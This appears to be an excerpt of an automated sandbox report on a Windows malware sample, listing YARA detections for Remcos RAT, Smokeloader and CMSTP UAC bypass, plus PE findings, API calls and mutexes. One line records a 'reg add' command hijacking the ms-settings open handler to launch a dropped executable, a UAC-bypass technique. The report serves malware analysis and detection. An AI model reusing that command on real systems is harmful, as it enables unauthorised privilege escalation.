                        Source: api-ms-win-core-localization-l1-2-0.dll.39.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-profile-l1-1-0.dll.39.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-crt-conio-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-errorhandling-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-crt-time-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-processthreads-l1-1-0.dll.39.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-console-l1-1-0.dll.39.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-crt-environment-l1-1-0.dll.39.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-crt-locale-l1-1-0.dll.39.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-handle-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-util-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-crt-convert-l1-1-0.dll.39.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-crt-time-l1-1-0.dll.39.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-crt-conio-l1-1-0.dll.39.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-crt-process-l1-1-0.dll.39.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-processenvironment-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-libraryloader-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-crt-runtime-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-string-l1-1-0.dll.39.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-interlocked-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-namedpipe-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-crt-stdio-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-synch-l1-1-0.dll.39.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-synch-l1-2-0.dll.39.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-crt-math-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
                        Source: Og1SeeXcB2.exe, 00000000.00000003.1674775597.00000000027E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeP vs Og1SeeXcB2.exe
                        Source: Og1SeeXcB2.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\user\AppData\Local\Temp\DE5A.exe" /f
                        Source: 66.2.WindowsUpdateServices.exe.630000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 66.2.WindowsUpdateServices.exe.630000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 66.2.WindowsUpdateServices.exe.630000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 66.2.WindowsUpdateServices.exe.630000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 66.2.WindowsUpdateServices.exe.630000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 66.2.WindowsUpdateServices.exe.630000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 67.2.iexplore.exe.3300000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 67.2.iexplore.exe.3300000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 67.2.iexplore.exe.3300000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 66.0.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 66.0.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 66.0.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 61.2.bound.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 61.2.bound.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 61.2.bound.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 61.0.bound.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 61.0.bound.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 61.0.bound.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 67.2.iexplore.exe.3300000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 67.2.iexplore.exe.3300000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 67.2.iexplore.exe.3300000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 66.2.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 66.2.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 66.2.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 0000003D.00000003.2501512368.00000000006B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 00000042.00000002.2546887311.0000000000459000.00000002.00000001.01000000.00000031.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 0000002E.00000003.2495061783.000001E8E7F87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 00000042.00000003.2544077192.000000000074B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 0000003D.00000000.2500248903.0000000000459000.00000002.00000001.01000000.00000030.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 00000042.00000000.2533901161.0000000000459000.00000002.00000001.01000000.00000031.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 0000003D.00000002.2539602011.0000000000459000.00000002.00000001.01000000.00000030.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 0000002E.00000003.2496650937.000001E8E8091000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 0000000F.00000002.2017597409.0000000000901000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                        Source: 0000000F.00000002.2017513277.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                        Source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: Process Memory Space: DE5A.exe PID: 5632, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: bound.exe PID: 1860, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, type: DROPPEDMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: libcrypto-3.dll.21.drStatic PE information: Section: UPX1 ZLIB complexity 0.999059198943662
                        Source: libssl-3.dll.21.drStatic PE information: Section: UPX1 ZLIB complexity 0.9916915494109948
                        Source: python312.dll.21.drStatic PE information: Section: UPX1 ZLIB complexity 0.9992940650795991
                        Source: sqlite3.dll.21.drStatic PE information: Section: UPX1 ZLIB complexity 0.9977444556451613
                        Source: unicodedata.pyd.21.drStatic PE information: Section: UPX1 ZLIB complexity 0.9945046482974911
                        Source: libcrypto-3.dll.39.drStatic PE information: Section: UPX1 ZLIB complexity 0.999059198943662
                        Source: libssl-3.dll.39.drStatic PE information: Section: UPX1 ZLIB complexity 0.9916915494109948
                        Source: python312.dll.39.drStatic PE information: Section: UPX1 ZLIB complexity 0.9992940650795991
                        Source: sqlite3.dll.39.drStatic PE information: Section: UPX1 ZLIB complexity 0.9977444556451613
                        Source: unicodedata.pyd.39.drStatic PE information: Section: UPX1 ZLIB complexity 0.9945046482974911
                        Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@108/171@11/7
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00A041FA GetLastError,FormatMessageW,10_2_00A041FA
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeCode function: 0_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040348F
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009F2010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_009F2010
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009F1A0B AdjustTokenPrivileges,CloseHandle,10_2_009F1A0B
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_009F2010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,13_2_009F2010
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_009F1A0B AdjustTokenPrivileges,CloseHandle,13_2_009F1A0B
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_001A2010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,20_2_001A2010
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_001A1A0B AdjustTokenPrivileges,CloseHandle,20_2_001A1A0B
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeCode function: 0_2_00404822 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404822
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009FDD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,10_2_009FDD87
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeCode function: 0_2_004021A2 CoCreateInstance,0_2_004021A2
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00A03A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,10_2_00A03A0E
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\ProjectedJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1904:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7040:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5896:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6820:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4336:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2484:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3608:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5476:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1188:120:WilError_03
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeMutant created: \Sessions\1\BaseNamedObjects\s
                        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7024:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1804:120:WilError_03
